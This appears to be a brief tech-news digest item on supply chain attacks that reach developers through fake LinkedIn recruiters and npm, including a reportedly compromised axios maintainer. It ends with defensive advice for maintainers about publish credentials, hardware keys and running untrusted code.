Supply chain attacks still running through LinkedIn and npm
A thread about a backdoor discovered in a LinkedIn job offer got traction, with commenters quickly connecting it to a broader pattern: the axios maintainer was reportedly compromised the same way. The attack vector is the same in both cases. A fake or social-engineered recruiter sends a script or package to run as part of an interview or onboarding process, and the developer runs it without scrutiny.
The npm-scan supply chain security project on the front page adds another data point. Supply chain attacks are not slowing down, and LinkedIn has become a reliable delivery mechanism because developers trust it as a professional context. 'Downloading random unprotected scripts from the internet like it is 1995' is how one commenter put it.
The conversation around Mac virtualization came up too, with people noting that sandboxed environments should be the default for running any unknown code, but in practice most developers do not bother.
So what?
If you are a founder or maintainer with a public npm presence, you are a target. The LinkedIn vector is specifically about social engineering maintainers with credibility. Review your publish credentials, use hardware keys for npm auth, and set a firm policy in your team about running code sent by unknown parties, regardless of the professional context it arrives in.